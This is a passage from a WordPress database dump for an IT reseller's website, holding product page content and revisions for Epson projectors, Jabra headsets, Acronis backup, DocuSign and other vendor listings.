colour gamut and brightness, you can astound audiences anywhere you go.\n<ul>\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\n 	<li>WXGA Resolution</li>\n 	<li>Real-Time Auto Keystone Correction</li>\n 	<li>Split Screen Projection</li>\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INTERACTIVE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-536WiÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></h4>\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\n<ul>\n 	<li>WXGA Resolution</li>\n 	<li>White and Colour Brightness at 3,300lm</li>\n 	<li>Multi-PC projection</li>\n 	<li>HDMI Connectivity x2</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>HIGH BRIGHTNESS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-L1405UNLÂ </strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>		\n		[maxbutton id=\"12\" ]<h4><strong>Epson EB-G7400UNLÂ </strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /><br>\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.</em>\n<ul>\n 	<li>High Brightness</li>\n 	<li>Beyond Full HD Resolution</li>\n 	<li>Powered Lens</li>\n 	<li>Portrait Projection</li>\n 	<li>Flexible Installation</li>\n 	<li>Edge Blending</li>\n 	<li>Point Correction</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-Z10000UÂ </strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>		\n		[maxbutton id=\"12\" ]		\n			<h2>DOCUMENT CAMERAS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Document Camera ELPDC21Â </strong><br><br><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></h4><br>\nCut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.\n<ul>\n 	<li>Pixels: 2MP (1920 x 1080 pixels)</li>\n 	<li>Camera Sensor: 1/2.7 inch CMOS Sensor</li>\n 	<li>Resolution: Up to Full HD (1080p)</li>\n 	<li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li>\n 	<li>Weight: Approx 3.0kg</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>','Epson','','publish','closed','closed','','epson','','','2019-09-26 11:22:47','2019-09-26 03:22:47','',0,'https://bintara.com.my/?page_id=1486',0,'page','',0),(1491,1,'2018-12-11 13:00:04','2018-12-11 05:00:04','Wireless Router, Router, Wireless Access Point, Switch. <a href=\"https://bintara.com.my/ubiquiti/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1841\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Ubiquiti-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','UBIQUITI','','publish','closed','closed','','ubiquiti','','','2019-01-03 10:10:15','2019-01-03 02:10:15','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1491',0,'portfolio','',0),(1492,1,'2018-12-11 13:00:27','2018-12-11 05:00:27','Backup &amp; Replication. <a href=\"https://bintara.com.my/veeam/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1698\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-11x.png\" alt=\"\" width=\"1024\" height=\"681\" />','VEEAM','','publish','closed','closed','','veeam','','','2019-09-23 16:03:25','2019-09-23 08:03:25','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1492',0,'portfolio','',0),(1493,1,'2018-12-11 13:00:16','2018-12-11 05:00:16','','CorelDRAW','','inherit','closed','closed','','1472-revision-v1','','','2018-12-11 13:00:16','2018-12-11 05:00:16','',1472,'https://bintara.com.my/blog/2018/12/11/1472-revision-v1/',0,'revision','',0),(1494,1,'2018-12-11 13:00:26','2018-12-11 05:00:26','','Dell EMC','','inherit','closed','closed','','1478-revision-v1','','','2018-12-11 13:00:26','2018-12-11 05:00:26','',1478,'https://bintara.com.my/blog/2018/12/11/1478-revision-v1/',0,'revision','',0),(1495,1,'2018-12-11 13:00:53','2018-12-11 05:00:53','<a href=\"https://bintara.com.my/veritas/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1711\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Veritas-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','VERITAS','','publish','closed','closed','','veritas','','','2019-01-03 10:11:22','2019-01-03 02:11:22','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1495',0,'portfolio','',0),(1496,1,'2018-12-11 13:00:51','2018-12-11 05:00:51','','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2018-12-11 13:00:51','2018-12-11 05:00:51','',1480,'https://bintara.com.my/blog/2018/12/11/1480-revision-v1/',0,'revision','',0),(1497,1,'2018-12-11 13:00:58','2018-12-11 05:00:58','','Docusign','','inherit','closed','closed','','1481-revision-v1','','','2018-12-11 13:00:58','2018-12-11 05:00:58','',1481,'https://bintara.com.my/blog/2018/12/11/1481-revision-v1/',0,'revision','',0),(1498,1,'2018-12-11 13:01:23','2018-12-11 05:01:23','Interactive pen displays, pen tablets, and styluses. <a href=\"https://bintara.com.my/wacom/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1714\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Wacom-logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','WACOM','','publish','closed','closed','','wacom','','','2019-01-03 10:11:44','2019-01-03 02:11:44','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1498',0,'portfolio','',0),(1499,1,'2018-12-11 13:02:06','2018-12-11 05:02:06','<a href=\"https://bintara.com.my/watchguard/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1842\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WatchGuard-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','WATCHGUARD','','publish','closed','closed','','watchguard','','','2019-01-03 10:12:00','2019-01-03 02:12:00','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1499',0,'portfolio','',0),(2871,1,'2019-02-11 11:45:15','2019-02-11 03:45:15','<h2>Jabra.</h2><h3>Sound thatâ€™s engineered for you</h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.</p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.</p><h2>Jabra Evolve Series</h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office</h3>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-150x150.jpg 150w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve.jpg 585w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Better concentration, greater productivity</h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.</p><ul><li>World-class speakers to deliver amazing sound for calls and music.</li><li>Call-management features allow for incredible ease-of-use..</li><li>Compatible with all leading UC platforms.</li></ul><h3>Jabra Evolve 65t</h3><p>The Jabra Evolve 65t are the worldâ€™s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGelsâ„¢ for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/JabraEvolve65t_ProductImage.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_80.png\" alt=\"\" />											\n		<h3>Jabra Evolve 80</h3><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 75e</h3><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation â€“ but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Evolve75e.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\" alt=\"\" />											\n		<h3>Jabra Evolve 75</h3><p>Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise â€“ and need mobility around the workspace. Move up to 100ft/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 65 Stereo / Mono</h3><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_65.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\" alt=\"\" />											\n		<h3>Jabra Evolve 40 Stereo / Mono</h3><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 30 Stereo / Mono</h3><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_30_.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" />											\n		<h3>Jabra Evolve 20 Stereo / Mono</h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 20 SE</h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono.png 400w\" sizes=\"(max-width: 150px) 100vw, 150px\" />											\n										<img width=\"263\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Engage_50_3-263x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Engage_50_3-263x300.png 263w, https://bintara.com.my/wp-content/uploads/2019/02/Engage_50_3.png 550w\" sizes=\"(max-width: 263px) 100vw, 263px\" />											\n		<h4>Jabra Engage 50</h4><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform â€“ whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.</p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.</p><p>[maxbutton id=\"14\" ]</p>','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2019-02-11 11:45:15','2019-02-11 03:45:15','',1532,'https://bintara.com.my/blog/2019/02/11/1532-revision-v1/',0,'revision','',0),(2870,1,'2019-02-11 11:44:27','2019-02-11 03:44:27','','Engage_50_3','','inherit','closed','closed','','engage_50_3','','','2019-02-11 11:44:27','2019-02-11 03:44:27','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/Engage_50_3.png',0,'attachment','image/png',0),(1501,1,'2018-12-11 13:03:18','2018-12-11 05:03:18','<a href=\"https://bintara.com.my/western-digital/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1843\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WD-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','WESTERN DIGITAL','','publish','closed','closed','','western-digital','','','2019-01-03 10:13:25','2019-01-03 02:13:25','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1501',0,'portfolio','',0),(1502,1,'2018-12-11 13:02:28','2018-12-11 05:02:28','','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2018-12-11 13:02:28','2018-12-11 05:02:28','',1473,'https://bintara.com.my/blog/2018/12/11/1473-revision-v1/',0,'revision','',0),(1504,1,'2018-12-11 13:10:14','2018-12-11 05:10:14','Windows data compression tool. <a href=\"https://bintara.com.my/winrar/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1844\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Winrar-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','WINRAR','','publish','closed','closed','','winrar','','','2019-01-03 10:15:26','2019-01-03 02:15:26','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1504',0,'portfolio','',0),(1505,1,'2018-12-11 13:15:17','2018-12-11 05:15:17','Barcode Scanners, Data Capture, Mobile Printers, Card Printers, Rugged headsets and Mobile Computers. <a href=\"http://bintara.com.my/zebra\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1715\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Zebra-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','ZEBRA','','publish','closed','closed','','zebra','','','2019-01-03 10:15:43','2019-01-03 02:15:43','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1505',0,'portfolio','',0),(1506,1,'2018-12-11 13:15:30','2018-12-11 05:15:30','<a href=\"https://bintara.com.my/zoom-meetings-chat/\">Zoom Meeting</a>\r\n\r\n<a href=\"https://bintara.com.my/zoom/\">Zoom for the Conference Room</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone wp-image-1845 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Zoom-Logo.png\" alt=\"Zoom Logo\" width=\"1024\" height=\"681\" />\r\n\r\n&nbsp;','ZOOM','','publish','closed','closed','','zoom','','','2019-03-11 17:17:29','2019-03-11 09:17:29','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1506',0,'portfolio','',0),(1507,1,'2018-12-11 14:11:18','2018-12-11 06:11:18','','Epson','','inherit','closed','closed','','1486-revision-v1','','','2018-12-11 14:11:18','2018-12-11 06:11:18','',1486,'https://bintara.com.my/blog/2018/12/11/1486-revision-v1/',0,'revision','',0),(1508,1,'2018-12-11 14:12:08','2018-12-11 06:12:08','','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2018-12-11 14:12:08','2018-12-11 06:12:08','',1483,'https://bintara.com.my/blog/2018/12/11/1483-revision-v1/',0,'revision','',0),(1509,1,'2018-12-11 14:12:44','2018-12-11 06:12:44','','ESET','','inherit','closed','closed','','1477-revision-v1','','','2018-12-11 14:12:44','2018-12-11 06:12:44','',1477,'https://bintara.com.my/blog/2018/12/11/1477-revision-v1/',0,'revision','',0),(1510,1,'2018-12-11 14:13:04','2018-12-11 06:13:04','','Faronics','','inherit','closed','closed','','1484-revision-v1','','','2018-12-11 14:13:04','2018-12-11 06:13:04','',1484,'https://bintara.com.my/blog/2018/12/11/1484-revision-v1/',0,'revision','',0),(1511,1,'2018-12-11 14:13:25','2018-12-11 06:13:25','','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2018-12-11 14:13:25','2018-12-11 06:13:25','',1474,'https://bintara.com.my/blog/2018/12/11/1474-revision-v1/',0,'revision','',0),(1512,1,'2018-12-11 14:14:08','2018-12-11 06:14:08','','FujiXerox','','inherit','closed','closed','','1482-revision-v1','','','2018-12-11 14:14:08','2018-12-11 06:14:08','',1482,'https://bintara.com.my/blog/2018/12/11/1482-revision-v1/',0,'revision','',0),(1514,1,'2018-12-11 14:37:53','2018-12-11 06:37:53','','Fuji Xerox','','inherit','closed','closed','','1482-revision-v1','','','2018-12-11 14:37:53','2018-12-11 06:37:53','',1482,'https://bintara.com.my/blog/2018/12/11/1482-revision-v1/',0,'revision','',0),(1873,1,'2018-12-12 12:53:13','2018-12-12 04:53:13','CorelDraw Logo','CorelDraw Logo','CorelDraw Logo','inherit','closed','closed','','coreldraw-logo-2','','','2018-12-12 12:53:39','2018-12-12 04:53:39','',1366,'https://bintara.com.my/wp-content/uploads/2018/12/CorelDraw-Logo-1.png',0,'attachment','image/png',0),(2080,1,'2018-12-13 22:02:35','2018-12-13 14:02:35','','office printer','','inherit','closed','closed','','office-printer','','','2018-12-13 22:02:35','2018-12-13 14:02:35','',1528,'https://bintara.com.my/wp-content/uploads/2018/12/office-printer.png',0,'attachment','image/png',0),(1520,1,'2018-12-11 14:51:15','2018-12-11 06:51:15','<h2>Acronis Backup Software for Business</h2>\r\n<h2></h2>\r\n<h3>Every Acronis backup solution delivers</h3>\r\n<div class=\"row\">\r\n<div class=\"col col-4\">\r\n<div><img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div><img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div><img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2018-12-11 14:51:15','2018-12-11 06:51:15','',1435,'https://bintara.com.my/blog/2018/12/11/1435-revision-v1/',0,'revision','',0),(1516,1,'2018-12-11 14:46:54','2018-12-11 06:46:54','<div class=\"overview-editorials__image\">\r\n<div class=\"field field-name-field-background-image field-type-image field-label-hidden\"><picture><img class=\"\" title=\"\" src=\"https://www.docusign.com/sites/default/files/styles/overview_editorial__2x_mobile/public/product_shot_1_2.png?itok=8vL6jFOj&amp;timestamp=1509057577\" alt=\"DocuSign product image\" width=\"419\" height=\"237\" /></picture></div>\r\n</div>\r\n<div class=\"overview-editorials__content\">\r\n<h3 class=\"overview-editorials__title\">Sign. Send. Success.</h3>\r\n<div class=\"overview-editorials__body\">Use DocuSign to complete approvals and agreements in minutes or hoursâ€”not daysâ€”from almost anywhere in the world. Quickly and securely access and sign documents. Easily upload and send documents for others to sign. Send reminders and check signing status almost any time.</div>\r\n<a class=\"link-primary\" href=\"https://www.docusign.com/products/electronic-signature/how-docusign-works\">Learn how DocuSign eSignatures work</a></div>\r\n<div></div>\r\n<div>\r\n<div class=\"overview-editorials__image\">\r\n<div class=\"field field-name-field-background-image field-type-image field-label-hidden\"><picture><img class=\" lazyloaded\" title=\"\" src=\"https://www.docusign.com/sites/default/files/styles/overview_editorial__2x_mobile/public/product_shot_2_2.png?itok=y5ozodoz&amp;timestamp=1510601096\" alt=\"DocuSign product image\" width=\"442\" height=\"250\" /></picture></div>\r\n</div>\r\n<div class=\"overview-editorials__content\">\r\n<h3></h3>\r\n<h3 class=\"overview-editorials__title\">Modernize your System of Agreement</h3>\r\n<div class=\"overview-editorials__body\">\r\n\r\nGo digital beyond the signature. Save additional time, money, and errors by automating and connecting entire agreement processes. Embed electronic signing and payment requests into your existing website, portals, and applications. Use DocuSignâ€™s pre-built integrations or APIs to connect to the systems you already use. With DocuSign, you not only get The Global Standard for eSignatureÂ® but also the many options of a System of Agreement Platform.\r\n\r\n<a class=\"learn-more-link\" href=\"https://www.docusign.com/features-and-benefits/small-and-medium-sized-businesses\">Learn about DocuSign for SMB</a>\r\n<a class=\"learn-more-link\" href=\"https://www.docusign.com/features-and-benefits/enterprises\">Learn about DocuSign for Enterprises</a>\r\n<a class=\"learn-more-link\" href=\"https://www.docusign.com/products/system-of-agreement\">Learn about the DocuSign System of Agreement Platform</a>\r\n\r\n&nbsp;\r\n\r\n</div>\r\nDocuSign is used across industries, regions, and organizations large and small. Our products include the powerful features you need with the ease-of-use you require, so you can get your work done quickly.\r\n\r\n</div>\r\n</div>','Docusign','','inherit','closed','closed','','1481-revision-v1','','','2018-12-11 14:46:54','2018-12-11 06:46:54','',1481,'https://bintara.com.my/blog/2018/12/11/1481-revision-v1/',0,'revision','',0),(1518,1,'2018-12-11 14:49:46','2018-12-11 06:49:46','','Docusign','','inherit','closed','closed','','1481-revision-v1','','','2018-12-11 14:49:46','2018-12-11 06:49:46','',1481,'https://bintara.com.my/blog/2018/12/11/1481-revision-v1/',0,'revision','',0),(1517,1,'2018-12-11 14:48:09','2018-12-11 06:48:09','<div class=\"overview-editorials__image\">\r\n<div class=\"field field-name-field-background-image field-type-image field-label-hidden\"><picture><img class=\"\" title=\"\" src=\"https://www.docusign.com/sites/default/files/styles/overview_editorial__2x_mobile/public/product_shot_1_2.png?itok=8vL6jFOj&amp;timestamp=1509057577\" alt=\"DocuSign product image\" width=\"419\" height=\"237\" /></picture></div>\r\n</div>\r\n<div class=\"overview-editorials__content\">\r\n<h3 class=\"overview-editorials__title\">Sign. Send. Success.</h3>\r\n<div class=\"overview-editorials__body\">Use DocuSign to complete approvals and agreements in minutes or hoursâ€”not daysâ€”from almost anywhere in the world. Quickly and securely access and sign documents. Easily upload and send documents for others to sign. Send reminders and check signing status almost any time.</div>\r\n<a class=\"link-primary\" href=\"https://www.docusign.com/products/electronic-signature/how-docusign-works\">Learn how DocuSign eSignatures work</a>\r\n\r\n</div>\r\n<div></div>\r\n<div>\r\n<div class=\"overview-editorials__image\">\r\n<div class=\"field field-name-field-background-image field-type-image field-label-hidden\"><picture><img class=\" lazyloaded\" title=\"\" src=\"https://www.docusign.com/sites/default/files/styles/overview_editorial__2x_mobile/public/product_shot_2_2.png?itok=y5ozodoz&amp;timestamp=1510601096\" alt=\"DocuSign product image\" width=\"442\" height=\"250\" /></picture></div>\r\n</div>\r\n<div class=\"overview-editorials__content\">\r\n<h3></h3>\r\n<h3 class=\"overview-editorials__title\">Modernize your System of Agreement</h3>\r\n<div class=\"overview-editorials__body\">\r\n\r\nGo digital beyond the signature. Save additional time, money, and errors by automating and connecting entire agreement processes. Embed electronic signing and payment requests into your existing website, portals, and applications. Use DocuSignâ€™s pre-built integrations or APIs to connect to the systems you already use. With DocuSign, you not only get The Global Standard for eSignatureÂ® but also the many options of a System of Agreement Platform.\r\n\r\n<a class=\"learn-more-link\" href=\"https://www.docusign.com/features-and-benefits/small-and-medium-sized-businesses\">Learn about DocuSign for SMB</a>\r\n<a class=\"learn-more-link\" href=\"https://www.docusign.com/features-and-benefits/enterprises\">Learn about DocuSign for Enterprises</a>\r\n<a class=\"learn-more-link\" href=\"https://www.docusign.com/products/system-of-agreement\">Learn about the DocuSign System of Agreement Platform</a>\r\n\r\n&nbsp;\r\n\r\n</div>\r\nDocuSign is used across industries, regions, and organizations large and small. Our products include the powerful features you need with the ease-of-use you require, so you can get your work done quickly.\r\n\r\n</div>\r\n</div>','Docusign','','inherit','closed','closed','','1481-revision-v1','','','2018-12-11 14:48:09','2018-12-11 06:48:09','',1481,'https://bintara.com.my/blog/2018/12/11/1481-revision-v1/',0,'revision','',0),(2109,1,'2019-09-18 14:47:02','2019-09-18 06:47:02','<h1>Acronis Backup Software for Business</h1>\n\n&nbsp;\n\n<h3>Every Acronis backup solution delivers</h3>\n\n&nbsp;\n\n<div class=\"row\" style=\"border: 1px solid #e9e9e9;\">\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\n<div>\n\n<center>\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\n</center>\n<h3>Active Ransomware Protection</h3>\n<div style=\"margin-bottom: 2px;\">Detects and stops both known and unknown strains of ransomware</div>\n</div>\n</div>\n<div class=\"col col-4\" style=\"border-right: 1px solid #e9e9e9;\">\n<div>\n\n<center>\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\n</center>\n<h3>Platform Flexibility</h3>\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\n</div>\n</div>\n<div class=\"col col-4\">\n<div>\n\n<center>\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\n</center>\n<h3>Total Control</h3>\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\n</div>\n</div>\n</div>\n\n&nbsp;\n&nbsp;\n\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-autosave-v1','','','2019-09-18 14:47:02','2019-09-18 06:47:02','',1435,'https://bintara.com.my/blog/2018/12/13/1435-autosave-v1/',0,'revision','',0),(2073,1,'2018-12-13 21:24:42','2018-12-13 13:24:42','<a href=\"https://bintara.com.my/honeywell/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1678\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-211x.png\" alt=\"\" width=\"1024\" height=\"681\" />','HONEYWELL','','publish','closed','closed','','honeywell','','','2019-09-23 16:20:12','2019-09-23 08:20:12','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=2073',0,'portfolio','',0),(2074,1,'2018-12-13 21:30:04','2018-12-13 13:30:04','<h3>Toughbook and Toughpad Range</h3>\r\n<div class=\"field field-name-body field-type-text-with-summary field-label-hidden\">\r\n<div class=\"field-items\">\r\n<div class=\"field-item even\">\r\n\r\nWhatever your sector, whatever your challenge, whatever your working conditions, there will be a Toughbook solution for you, ranging from the ultra-durability of our fully ruggedised Toughbook and 